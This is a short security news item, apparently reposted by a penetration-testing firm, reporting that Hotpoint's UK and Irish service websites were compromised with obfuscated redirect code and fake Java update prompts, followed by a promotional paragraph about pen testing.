Hotpoint’s UK service websites were hacked over the Easter weekend.
Fake Java update dialogs started appearing on the company’s sites. Clicking on these links took the visitors to a payload of malware.
The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.
The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.
Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.
Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10 year parts guarantee.
Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.
Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.
How can Pen testing prevent vulnerabilities?One of the key steps to measure operational risk is the need to understand where you are vulnerable to an attack, and where you may have already been compromised.
Penetration (Pen) Testing is a specialised discipline that encompasses a lot more than simply running a Vulnerability Assessment (VA) tool. Pen tests should follow formal procedures, use a multitude of scan tools and more importantly be undertaken by experienced engineers who can interpret the Vulnerability Assessment results to create stronger cascading attack scenarios. The test should also be undertaken by staff independent of any other function to ensure the tester provide objective and impartial reports. CST can help with this approach.
You can read the original story here.